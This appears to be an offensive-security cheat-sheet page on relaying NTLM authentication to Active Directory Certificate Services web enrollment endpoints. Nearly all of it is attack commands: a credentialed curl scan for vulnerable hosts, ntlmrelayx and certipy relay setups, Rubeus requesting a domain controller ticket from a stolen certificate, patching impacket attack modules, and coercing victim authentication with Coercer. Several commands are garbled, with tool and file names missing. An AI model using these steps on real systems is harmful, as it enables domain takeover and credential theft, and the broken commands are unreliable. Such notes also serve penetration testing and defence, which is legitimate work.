NTLM Relay to AD CS HTTP Endpoints


Discover CES endpoints with certutil:

Cmd > certutil.exe -enrollmentServerURL -config CA01.megacorp.local\CA01

Discover CES endpoints with PowerShell:

PS > Get-CertificationAuthority | select name,enroll* | fl

Check a bunch of targets for the vulnerable endpoint:

$ for ip in `cat ~/ws/discover/hosts/ca.txt`; do curl -sSLkI -u 'MEGACORP\snovvcrash:Passw0rd!' --ntlm http://$ip/certsrv/certfnsh.asp | grep -e 401 -e 200 > /dev/null && echo "[+] $ip" || echo "[-] $ip"; done



$ -t http://CA01.megacorp.local/certsrv/certfnsh.asp -smb2support --adcs [--template VulnTemplate] --no-http-server --no-wcf-server --no-raw-server
$ python3 -d '' -u '' -p ''
PS > .\Rubeus.exe asktgt /user:DC1$ /domain:megacorp.local /dc:DC1.megacorp.local /certificate:<BASE64_PFX_CERT> /ptt


Backup original and copy one from the toolkit with a modified domain name and a template if needed (DomainController is by default, but also one may use KerberosAuthentication):

$ sudo cp /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/ /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/
$ subl ntlmrelayx/
$ sudo cp ntlmrelayx/ /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/

Perform the relay attack, request the TGT via PKINIT and get the NT hash based on U2U Kerberos extension:

$ -t http://CA01.megacorp.local/certsrv/certfnsh.asp -smb2support --no-http-server --no-wcf-server --no-raw-server
$ python3 -d '' -u '' -p ''
$ python3 megacorp.local/'DC1$' -cert-pem cert.pem -key-pem privatekey.pem dc1.ccache
$ KRB5CCNAME=dc1.ccache python3 megacorp.local/'DC1$' -key 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff

Revert the original

$ sudo mv /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/ /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/


Prepare for the relay attack:

$ certipy relay -ca -template DomainController


Start a relay server:

PS > .\ADCSPwn.exe --adcs CA01.megacorp.local

Coerce the authentication, e. g. via Coercer:

$ coercer coerce -u snovvcrash -p 'Passw0rd!' -t -l VICTIM01 --auth-type http --http-port 8080

Last updated